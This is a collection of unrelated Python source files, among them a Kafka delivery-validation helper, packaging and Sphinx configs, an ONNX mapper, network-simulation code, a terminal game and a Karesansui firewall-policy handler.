:param dst_node: The destination node to check for reachability to.
:return: True only if dst is reachable from src.
"""
return 0 == src_node.account.ssh("nc -w 3 -z %s 22" % dst_node.account.hostname, allow_fail=True)
def annotate_missing_msgs(missing, acked, consumed, msg):
missing_list = list(missing)
msg += "%s acked message did not make it to the Consumer. They are: " %\
len(missing_list)
if len(missing_list) < 20:
msg += str(missing_list) + ". "
else:
msg += ", ".join(str(m) for m in missing_list[:20])
msg += "...plus %s more. Total Acked: %s, Total Consumed: %s. " \
% (len(missing_list) - 20, len(set(acked)), len(set(consumed)))
return msg
def annotate_data_lost(data_lost, msg, number_validated):
print_limit = 10
if len(data_lost) > 0:
msg += "The first %s missing messages were validated to ensure they are in Kafka's data files. " \
"%s were missing. This suggests data loss. Here are some of the messages not found in the data files: %s\n" \
% (number_validated, len(data_lost), str(data_lost[0:print_limit]) if len(data_lost) > print_limit else str(data_lost))
else:
msg += "We validated that the first %s of these missing messages correctly made it into Kafka's data files. " \
"This suggests they were lost on their way to the consumer." % number_validated
return msg
def validate_delivery(acked, consumed, idempotence_enabled=False, check_lost_data=None, may_truncate_acked_records=False):
"""Check that each acked message was consumed."""
success = True
msg = ""
# Correctness of the set difference operation depends on using equivalent
# message_validators in producer and consumer
missing = set(acked) - set(consumed)
# Were all acked messages consumed?
if len(missing) > 0:
msg = annotate_missing_msgs(missing, acked, consumed, msg)
# Did we miss anything due to data loss?
if check_lost_data:
max_truncate_count = 100 if may_truncate_acked_records else 0
max_validate_count = max(1000, max_truncate_count)
to_validate = list(missing)[0:min(len(missing), max_validate_count)]
data_lost = check_lost_data(to_validate)
# With older versions of message format before KIP-101, data loss could occur due to truncation.
# These records won't be in the data logs. Tolerate limited data loss for this case.
if len(missing) < max_truncate_count and len(data_lost) == len(missing):
msg += "The %s missing messages were not present in Kafka's data files. This suggests data loss " \
"due to truncation, which is possible with older message formats and hence are ignored " \
"by this test. The messages lost: %s\n" % (len(data_lost), str(data_lost))
else:
msg = annotate_data_lost(data_lost, msg, len(to_validate))
success = False
else:
success = False
# Are there duplicates?
if len(set(consumed)) != len(consumed):
num_duplicates = abs(len(set(consumed)) - len(consumed))
if idempotence_enabled:
success = False
msg += "Detected %d duplicates even though idempotence was enabled.\n" % num_duplicates
else:
msg += "(There are also %d duplicate messages in the log - but that is an acceptable outcome)\n" % num_duplicates
return success, msg
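# Illustrative outcomes (made-up message lists): a duplicate without
# idempotence is tolerated, but any missing acked message fails validation
# when no check_lost_data callback is supplied.
#
#   validate_delivery(acked=[1, 2, 3], consumed=[1, 2, 2, 3])  # -> (True, "...1 duplicate...")
#   validate_delivery(acked=[1, 2, 3], consumed=[1, 2])        # -> (False, "...did not make it...")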
|
py | b40b4d5af13c3219e82e3c7e07ee632bba4e2fda | """A setuptools based setup module.
See:
https://packaging.python.org/en/latest/distributing.html
https://github.com/pypa/sampleproject
"""
from setuptools import setup, find_packages
# To use a consistent encoding
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='adafruit-circuitpython-ble-adafruit',
use_scm_version=True,
setup_requires=['setuptools_scm'],
description='Description ',
long_description=long_description,
long_description_content_type='text/x-rst',
# The project's main homepage.
url='https://github.com/adafruit/Adafruit_CircuitPython_BLE_Adafruit',
# Author details
author='Adafruit Industries',
author_email='[email protected]',
install_requires=[
'Adafruit-Blinka',
'adafruit-circuitpython-ble'
],
# Choose your license
license='MIT',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Topic :: Software Development :: Libraries',
'Topic :: System :: Hardware',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
],
# What does your project relate to?
keywords='adafruit blinka circuitpython micropython circuitplayground bluefruit CLUE ble',
# You can just specify the packages manually here if your project is
# simple. Or you can use find_packages().
# TODO: IF LIBRARY FILES ARE A PACKAGE FOLDER,
# CHANGE `py_modules=['...']` TO `packages=['...']`
py_modules=['adafruit_ble_adafruit'],
)
|
py | b40b4e6c92ba273472a026eb09f0c693722c39dd | #
# Copyright 2018 Analytics Zoo Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from zoo.pipeline.api.onnx.mapper.operator_mapper import OperatorMapper
class SqueezeMapper(OperatorMapper):
def __init__(self, node, initializer, _all_tensors):
super(SqueezeMapper, self).__init__(node, initializer, _all_tensors)
def _to_tensor(self):
dim = None
if "axes" in self.onnx_attr.keys():
dim = tuple([int(i) for i in self.onnx_attr['axes']])
data = self.model_inputs[0].zvalue
return data.squeeze(dim=dim)
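# Assumed ONNX attribute semantics for reference: a node carrying axes=[0, 2]
# squeezes exactly dims (0, 2); a node without an "axes" attribute leaves
# dim=None, which squeezes every singleton dimension of the input tensor.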
|
py | b40b4e6d85f38337402db997b9d80eea3b061b6d | from datetime import datetime
from logging import getLogger
from typing import Any, List, Tuple
from watchmen_data_kernel.storage import TopicDataService
from watchmen_model.admin import Factor
from watchmen_model.dqc import MonitorRule
from watchmen_utilities import ArrayHelper
from .types import RuleResult
logger = getLogger(__name__)
# noinspection PyUnusedLocal
def factor_common_value_over_coverage(
data_service: TopicDataService, factor: Factor,
data: List[Tuple[Any, int]], rule: MonitorRule,
date_range: Tuple[datetime, datetime],
changed_rows_count_in_range: int, total_rows_count: int
) -> RuleResult:
if changed_rows_count_in_range == 0:
# no changes, success
return RuleResult.SUCCESS
mismatched = ArrayHelper(data) \
.filter(lambda row: row[1] / changed_rows_count_in_range * 100 >= rule.params.aggregation) \
.map(lambda row: row[1]) \
.filter(lambda value: value != 0) \
.some(lambda x: x / changed_rows_count_in_range * 100 > rule.params.coverageRate)
return RuleResult.FAILED if mismatched else RuleResult.SUCCESS
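# Worked example with hypothetical numbers: for 100 changed rows,
# aggregation=30 and coverageRate=40, a value occurring 45 times passes the
# aggregation filter (45% >= 30%) and exceeds the coverage threshold
# (45% > 40%), so the rule fails; a value occurring 35 times passes the
# filter but not the threshold, leaving the rule successful.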
|
py | b40b4ec0a53923a386cf21f4413c52a9d42aab42 | # :coding: utf-8
# :copyright: Copyright (c) 2013 Martin Pengelly-Phillips
# :license: See LICENSE.txt.
import mock
from sawmill.logger.traceback import Traceback
def test_extracting_traceback():
'''Test extracting traceback when key set to True.'''
handler = mock.Mock()
logger = Traceback(_handler=handler)
try:
raise ValueError('Forced error')
except Exception:
logger.log(traceback=True)
log = handler.handle.call_args[0][0]
assert isinstance(log['traceback'], basestring)
lines = log['traceback'].splitlines()
assert lines[0] == 'Traceback (most recent call last):'
assert lines[-1] == 'ValueError: Forced error'
def test_custom_traceback():
'''Test setting traceback manually.'''
handler = mock.Mock()
logger = Traceback(_handler=handler)
logger.log(traceback='Some other value')
log = handler.handle.call_args[0][0]
assert log['traceback'] == 'Some other value'
def test_extracting_traceback_outside_exception():
'''Test extracting traceback outside exception.'''
handler = mock.Mock()
logger = Traceback(_handler=handler)
logger.log(traceback=True)
log = handler.handle.call_args[0][0]
assert log['traceback'] == 'None'
|
py | b40b4edc8f227f651d055316f700f8f0f8524b07 | # pylint: disable=unused-argument
import gc
from itertools import product
import numpy as np
import pandas as pd
import igraph as ig
from scipy import stats
from sklearn.datasets import make_blobs
from sklearn.externals.joblib import Parallel, delayed
from tqdm import tqdm
from sdnet.utils import euclidean_dist, make_dist_matrix
from sdnet.sda import SDA
import ds
# Data simulation routines ----------------------------------------------------
def simulate_uniform(N, ndim, a=0, b=1, **kwds):
return np.random.uniform(a, b, (N, ndim)), None
def simulate_normal(N, ndim, mean=0, sd=1, **kwds):
return np.random.normal(mean, sd, (N, ndim)), None
def simulate_lognormal(N, ndim, mean=0, sd=1, **kwds):
return np.random.lognormal(mean, sd, (N, ndim)), None
def simulate_normal_clusters(N, ndim, centers=4, center_box=(-8, 8), **kwds):
return make_blobs(N, ndim, centers=centers, center_box=center_box, **kwds)
def simulate_lognormal_clusters(N, ndim, centers=4, center_box=(-4, 4), **kwds):
X, labels = make_blobs(N, ndim, centers=centers, center_box=center_box, **kwds)
return np.exp(X), labels
def simulate_space(kind, N, ndim, centers, **kwds):
kind = kind.lower()
if kind == 'uniform':
return simulate_uniform(N, ndim, **kwds)
if kind == 'normal':
return simulate_normal(N, ndim, **kwds)
if kind == 'lognormal':
return simulate_lognormal(N, ndim, **kwds)
if kind == 'clusters_normal':
return simulate_normal_clusters(N, ndim, centers, **kwds)
if kind == 'clusters_lognormal':
return simulate_lognormal_clusters(N, ndim, centers, **kwds)
raise ValueError(f"incorrect kind of data '{kind}'")
def simulate_degseq(kind, n, k):
kind = kind.lower()
if kind == 'poisson':
degseq = np.random.poisson(k, (n,))
elif kind == 'negbinom':
degseq = np.random.negative_binomial(1, 1 / (1+k), (n,))
elif kind == 'powerlaw':
m = int(k/2)
degseq = np.array(ig.Graph.Barabasi(n, m=m, directed=False).degree())
degseq = degseq + np.random.randint(-m, m, degseq.shape)
degseq[degseq >= n] = n-1
elif kind == 'lognormal':
degseq = np.random.lognormal(np.log(k) - 1/2, 1, (n,)).astype(int)
else:
raise ValueError(f"'{kind}' is not a correct type of degree sequence")
if degseq.sum() % 2 != 0:
return simulate_degseq(kind, n, k)
return degseq
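# Example draw (illustrative): simulate_degseq('poisson', n=1000, k=8) returns
# 1000 Poisson(8) degrees, resampling recursively until the sequence sum is
# even, as required for configuration-model graph construction.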
# Simulation runners ----------------------------------------------------------
def run_sda(X, labels, params, rep, simparams, dist=euclidean_dist):
# pylint: disable=too-many-locals
params = product(*[ tuple((k, _) for _ in v) for k, v in params.items() ])
classify_pl = simparams.get('classify_pl', False)
D = make_dist_matrix(X, dist, symmetric=True).astype(np.float32)
records = []
for p in params:
p = dict(p)
sda = SDA.from_dist_matrix(D, **p)
for idx in range(1, rep+1):
A = sda.adjacency_matrix(sparse=True) \
.astype(bool) \
.tolil()
degseq = A.toarray().sum(axis=1).astype(np.uint16)
G = ds.graph_from_sparse(A)
dct = {
'sid': idx,
**p,
'b': sda.b,
'k_avg': degseq.mean(),
'A': A if idx == 1 else None,
'labels': labels.astype(np.int8) if labels is not None else None,
'degseq': degseq,
'deg_skew': stats.skew(degseq),
'deg_kurt': stats.kurtosis(degseq),
'pl_type': ds.estimate_tail_exponent(degseq, n=2, classify=True) \
if classify_pl else None,
'isolates': (degseq == 0).sum(),
'clustering': G.transitivity_undirected(),
'assortativity': G.assortativity_degree(),
'average_path_length': G.average_path_length()
}
dct['degseq'] = degseq_to_text(degseq)
records.append(dct)
df = pd.DataFrame.from_dict(records)
df = df.loc[:, [
'sid', 'k', 'alpha', 'b', 'p_rewire',
'A', 'k_avg', 'clustering', 'assortativity', 'average_path_length',
'isolates', 'labels', 'directed',
'degseq', 'deg_skew', 'deg_kurt', 'pl_type'
]]
return df
def run_sdac(X, labels, params, rep, simparams, dist=euclidean_dist):
# pylint: disable=too-many-locals
params = list(product(*[ tuple((k, _) for _ in v) for k, v in params.items() ]))
conf_model_params = list(product(simparams['degseq_type'], simparams['sort']))
D = make_dist_matrix(X, dist, symmetric=True).astype(np.float32)
records = []
for p in params:
p = dict(p)
sda = SDA.from_dist_matrix(D, **p)
for degseq_type, sort in conf_model_params:
_degseq = simulate_degseq(
kind=degseq_type,
n=sda.N,
k=sda.k
)
sda.set_degseq(_degseq, sort=sort)
for idx in range(1, rep+1):
try:
A = sda.conf_model(simplify=True, sparse=True) \
.astype(bool) \
.tolil()
# pylint: disable=broad-except
except Exception:
continue
degseq = A.toarray().sum(axis=1).astype(np.uint16)
G = ds.graph_from_sparse(A)
dct = {
'sid': idx,
**p,
'b': sda.b,
'k_avg': degseq.mean(),
'degseq_type': degseq_type,
'degseq_sort': sort,
'A': A if idx == 1 else None,
'labels': labels.astype(np.int8) if labels is not None else None,
'degseq': degseq,
'deg_skew': stats.skew(degseq),
'deg_kurt': stats.kurtosis(degseq),
'isolates': (degseq == 0).sum(),
'clustering': G.transitivity_undirected(),
'assortativity': G.assortativity_degree(),
'average_path_length': G.average_path_length()
}
dct['degseq'] = degseq_to_text(degseq)
records.append(dct)
df = pd.DataFrame.from_dict(records)
df = df.loc[:, [
'sid', 'k', 'alpha', 'b', 'p_rewire',
'A', 'k_avg', 'clustering', 'assortativity', 'average_path_length',
'degseq_type', 'degseq_sort',
'isolates', 'labels', 'directed',
'degseq', 'deg_skew', 'deg_kurt',
]]
return df
def simulate(space, dparams, drep, sdaparams, sdarep, simparams,
n_jobs=4, simfunc=run_sda, **kwds):
dpars = list(product(range(1, drep+1), product(*dparams)))
def _func(idx, dpar, sdaparams, sdarep):
gc.collect()
X, labels = simulate_space(space, *dpar)
df = simfunc(X, labels, sdaparams, sdarep, simparams, **kwds)
df.insert(0, 'did', idx)
df.insert(2, 'centers', dpar[2])
df.insert(2, 'm', dpar[1])
df.insert(2, 'N', dpar[0])
df.insert(2, 'space', space)
        # Remove unnecessary network objects
df.loc[df['did'] != 1, 'A'] = None
return df
results = Parallel(n_jobs=n_jobs)(
delayed(_func)(idx, dpar, sdaparams, sdarep) for idx, dpar in tqdm(dpars)
)
df = None
for _df in results:
if _df is None:
continue
if df is None:
df = _df
else:
df = pd.concat((df, _df), ignore_index=True)
return df
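# Sketch of a driver call with hypothetical parameter grids (run_sda expects
# the SDA keyword grids used above, e.g. k/alpha/p_rewire/directed):
#
#   df = simulate(
#       space='clusters_normal',
#       dparams=[(1000,), (2,), (4,)],     # grids for N, ndim, centers
#       drep=2,
#       sdaparams={'k': (30,), 'alpha': (2, 4), 'p_rewire': (0.01,), 'directed': (False,)},
#       sdarep=5,
#       simparams={'classify_pl': True},
#   )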
# Postprocessing functions ----------------------------------------------------
def am_to_text(A):
if A is None:
return None
return '|'.join(map('-'.join, A.toarray().astype(str)))
def degseq_to_text(degseq):
if degseq is None:
return None
return '|'.join(degseq.astype(str))
|
py | b40b508be4a1ffd8a9281c2493395ba5d51fee58 |
print("Shaping data array...")
with open('sample.txt', 'r') as ip:
raw = ip.read()
contents = raw.replace('\n', ' ')
contents = contents.strip()
aslist = contents.split(' ')
def is_number(s):
try:
int(s)
return True
except ValueError:
return False
aslist = [k for k in aslist if is_number(k)]
with open('fractaloutput.txt', 'w') as op:
for i in range(0, len(aslist)):
if (i % 3) == 0:
op.write('[')
op.write(aslist[i])
if ((i + 1) % 3) == 0:
op.write('] ')
else:
op.write(' ')
if ((i + 1) % 768) == 0 and i != 0:
op.write('\n')
print("Data arranged")
|
py | b40b50ddc66c55ebdb8163f2ed8b7c0d3c71de3b | # -*- coding: utf-8 -*-
# @Author : Ecohnoch(xcy)
# @File : configs.py
# @Function : TODO
app_redis_hostname = 'my_redis'
app_redis_port = 6379
app_info_key = 'INFO_KEY'
app_response_key = 'RESPONSE_KEY'
app_error_key = 'ERROR_KEY'
app_kafka_host = 'my_kafka:9092'
app_kafka_topic = 'user_queue'
app_kafka_key = 'user_requests'
app_group_id = 'calculator'
app_web_host = 'http://face_storage:12350'
app_file_interface = '/get_image_file'
call_interval = 1
sleep_interval = 7 |
py | b40b51896d00920faadbb7ad14cc7d11920d0e6d | # Copyright (c) IBM Corp. 2018. All Rights Reserved.
# Project name: Constrained Exploration and Recovery from Experience Shaping
# This project is licensed under the MIT License, see LICENSE
import os
from ceres.tools.io.h5_helper import save_dict_as_h5, load_dict_from_h5
class ConstraintConfig(object):
'''
Constraint network configuration with save and restore functions
'''
valid_param = ['mlp_hidden_layers',
'n_ineq',
'loss_weights',
'spherical_coordinates',
'normalize_ineq_mat',
'predict_interior_point',
'interior_point_margin_min',
'interior_point_margin_max',
'interior_point_max']
cnet_config_filename = 'cnet_config.h5'
def __init__(self, **kwargs):
self.set_default()
self.set(**kwargs)
def set_default(self):
self.spherical_coordinates = False
self.normalize_ineq_mat = False
self.predict_interior_point = False
self.interior_point_margin_min = 0.
self.interior_point_margin_max = 0.
self.interior_point_max = 0.
self.loss_weights = {}
def set(self, **kwargs):
for key, value in kwargs.items():
assert key in self.valid_param, 'Invalid parameter type {0}'.format(key)
setattr(self, key, value)
def save(self, path_save):
d = self.__dict__
assert os.path.isdir(path_save), 'Config save function only takes a directory as input'
path_save = os.path.join(path_save, self.cnet_config_filename)
save_dict_as_h5(d, path_save, verbose=True)
@classmethod
def from_backup(cls, path_save):
if os.path.isdir(path_save):
path_cnet_dir = path_save
else:
path_cnet_dir = os.path.dirname(path_save)
path_cnet_config = os.path.join(path_cnet_dir, cls.cnet_config_filename)
d = load_dict_from_h5(path_cnet_config, verbose=False)
cnet_config = cls(**d)
return cnet_config
@classmethod
def from_extra_args(cls, args):
cnet_config = cls(mlp_hidden_layers=args.cnet_hidden_layers,
n_ineq=args.cnet_n_ineq,
loss_weights=args.cnet_loss_weights,
spherical_coordinates=args.cnet_spherical_coordinates,
normalize_ineq_mat=args.cnet_normalize_ineq_mat,
predict_interior_point=args.cnet_predict_interior_point,
interior_point_margin_min=args.cnet_interior_point_margin_min,
interior_point_margin_max=args.cnet_interior_point_margin_max,
interior_point_max=args.cnet_interior_point_max,
)
return cnet_config
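# Minimal usage sketch (hypothetical paths and values; the target directory
# must already exist, since save() asserts os.path.isdir):
#
#   config = ConstraintConfig(n_ineq=4, mlp_hidden_layers=[64, 64])
#   config.save('/tmp/ceres_run')   # writes /tmp/ceres_run/cnet_config.h5
#   restored = ConstraintConfig.from_backup('/tmp/ceres_run')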
|
py | b40b523df9f80d2d40850459fee8186d1716a1aa | import time
from playscii import GameObject, GameManager
from playscii.input import Input
class JumpManager(GameManager):
def __init__(self):
super().__init__((100, 6))
self.dino = MODIDino()
self.obstacle = Obstacle(self)
self.game_over = False
self.status = ""
self.score = 0
self.scoreboard = GameObject(pos=(50, 5), render='0')
def setup(self):
self.add_object(self.dino)
self.add_object(self.obstacle)
self.add_object(self.scoreboard)
def update(self):
if Input.get_key_down('q'):
self.quit()
self.scoreboard.render = str(self.score)
if self.game_over:
self.set_title("Game Over!!")
time.sleep(3)
self.game_over = False
self.score = 0
self.obstacle.speed = 30
self.obstacle.x = 160
self.set_title(self.status)
if 0 < self.obstacle.x - self.dino.x < 4 and self.dino.y < 3:
self.dino.vel = 0
self.obstacle.speed = 0
self.game_over = True
class MODIDino(GameObject):
def __init__(self):
super().__init__(pos=(10, 0), render='MODI', size=(4, 1))
self.touch_ground = True
self.vel = 0
def update(self):
if Input.get_key_down('space'):
if self.touch_ground:
self.vel = 15
self.touch_ground = False
if not self.touch_ground:
self.y += self.vel * self.delta_time
self.vel -= 20 * self.delta_time
if self.y < 0:
self.y = 0
self.touch_ground = True
class Obstacle(GameObject):
def __init__(self, parent):
super().__init__(pos=(100, 2), render='D\nD\nD', size=(1, 3))
self.speed = 30
self.manager = parent
def update(self):
self.x -= self.speed * self.delta_time
if self.x < 0:
self.x = 100
self.manager.score += 1
self.speed += 1
if __name__ == '__main__':
JumpManager().start()
|
py | b40b52a8a5e832fa03f1ce4493e8d9dd3f851e69 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# lintjenkins documentation build configuration file, created by
# sphinx-quickstart on Tue Jul 9 22:26:36 2013.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another
# directory, add these directories to sys.path here. If the directory is
# relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# Get the project root dir, which is the parent dir of this
cwd = os.getcwd()
project_root = os.path.dirname(cwd)
# Insert the project root dir as the first element in the PYTHONPATH.
# This lets us ensure that the source package is imported, and that its
# version is used.
sys.path.insert(0, project_root)
import lintjenkins
# -- General configuration ---------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'lintjenkins'
copyright = u"2017, westdoorblowcola"
# The version info for the project you're documenting, acts as replacement
# for |version| and |release|, also used in various other places throughout
# the built documents.
#
# The short X.Y version.
version = lintjenkins.__version__
# The full version, including alpha/beta/rc tags.
release = lintjenkins.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to
# some non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built
# documents.
#keep_warnings = False
# -- Options for HTML output -------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a
# theme further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as
# html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the
# top of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon
# of the docs. This file should be a Windows icon file (.ico) being
# 16x16 or 32x32 pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets)
# here, relative to this directory. They are copied after the builtin
# static files, so a file named "default.css" will overwrite the builtin
# "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names
# to template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer.
# Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer.
# Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages
# will contain a <link> tag referring to it. The value of this option
# must be the base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'lintjenkinsdoc'
# -- Options for LaTeX output ------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index', 'lintjenkins.tex',
u'lintjenkins Documentation',
u'westdoorblowcola', 'manual'),
]
# The name of an image file (relative to this directory) to place at
# the top of the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings
# are parts, not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'lintjenkins',
u'lintjenkins Documentation',
[u'westdoorblowcola'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ----------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'lintjenkins',
u'lintjenkins Documentation',
u'westdoorblowcola',
'lintjenkins',
'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
|
py | b40b52db76767373a14f5d418a7b998094ee5021 | # Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Externalvirtual(Package):
homepage = "http://somewhere.com"
url = "http://somewhere.com/stuff-1.0.tar.gz"
version('1.0', '1234567890abcdef1234567890abcdef')
version('2.0', '234567890abcdef1234567890abcdef1')
version('2.1', '34567890abcdef1234567890abcdef12')
version('2.2', '4567890abcdef1234567890abcdef123')
provides('stuff', when='@1.0:')
|
py | b40b5314289cf4e77422f902a6f015d06fcb6a5a | # -*- coding: utf-8 -*-
#
# This file is part of Karesansui.
#
# Copyright (C) 2009-2012 HDE, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
import os
import time
import web
from web.utils import Storage
from karesansui.lib.rest import Rest, auth
from karesansui.lib.firewall.iptables import KaresansuiIpTables
from karesansui.lib.checker import Checker, \
CHECK_EMPTY, CHECK_VALID, CHECK_LENGTH, CHECK_CHAR
from karesansui.lib.utils import is_param
def validates_policy(obj):
checker = Checker()
check = True
_ = obj._
checker.errors = []
if not is_param(obj.input, 'input_policy'):
check = False
checker.add_error(_('"%s" is required.') % _('INPUT Chain'))
else:
check = checker.check_firewall_policy(
_('INPUT Chain'),
obj.input.input_policy,
CHECK_EMPTY | CHECK_VALID
) and check
if not is_param(obj.input, 'output_policy'):
check = False
checker.add_error(_('"%s" is required.') % _('OUTPUT Chain'))
else:
check = checker.check_firewall_policy(
_('OUTPUT Chain'),
obj.input.output_policy,
CHECK_EMPTY | CHECK_VALID
) and check
if not is_param(obj.input, 'forward_policy'):
check = False
checker.add_error(_('"%s" is required.') % _('FORWARD Chain'))
else:
check = checker.check_firewall_policy(
_('FORWARD Chain'),
            obj.input.forward_policy,
CHECK_EMPTY | CHECK_VALID
) and check
obj.view.alert = checker.errors
return check
class HostBy1FirewallPolicy(Rest):
@auth
def _GET(self, *param, **params):
host_id = self.chk_hostby1(param)
if host_id is None: return web.notfound()
self.view.host_id = host_id
kit = KaresansuiIpTables()
        if not os.path.exists(kit.firewall_xml_file):
self.view.have_config = False
else:
self.view.have_config = True
kit.firewall_xml = kit.read_firewall_xml()
for chain in kit.basic_chains['filter']:
try:
policy = kit.firewall_xml['filter'][chain]['policy']
except:
policy = 'ACCEPT'
chain = chain.lower()
exec("self.view.%s_policy_ACCEPT_checked = ''" % chain)
exec("self.view.%s_policy_DROP_checked = ''" % chain)
exec("self.view.%s_policy_REJECT_checked = ''" % chain)
if policy == 'REJECT':
exec("self.view.%s_policy = 'REJECT'" % chain)
exec("self.view.%s_policy_REJECT_checked = 'checked'" % chain)
elif policy == 'DROP':
exec("self.view.%s_policy = 'DROP'" % chain)
exec("self.view.%s_policy_DROP_checked = 'checked'" % chain)
self.view.base_policy_DROP_checked = 'checked';
else:
exec("self.view.%s_policy = 'ACCEPT'" % chain)
exec("self.view.%s_policy_ACCEPT_checked = 'checked'" % chain)
self.view.iptables = Storage(
is_running=kit.is_running(),
is_configured=kit.is_configured(),
)
self.view.targets = kit.basic_targets['filter']
return True
@auth
def _PUT(self, *param, **params):
host_id = self.chk_hostby1(param)
if host_id is None: return web.notfound()
kit = KaresansuiIpTables()
kit.firewall_xml = kit.read_firewall_xml()
if not validates_policy(self):
self.logger.debug("Create account is failed, Invalid input value")
return web.badrequest(self.view.alert)
kit.modify_policy("INPUT", self.input.input_policy)
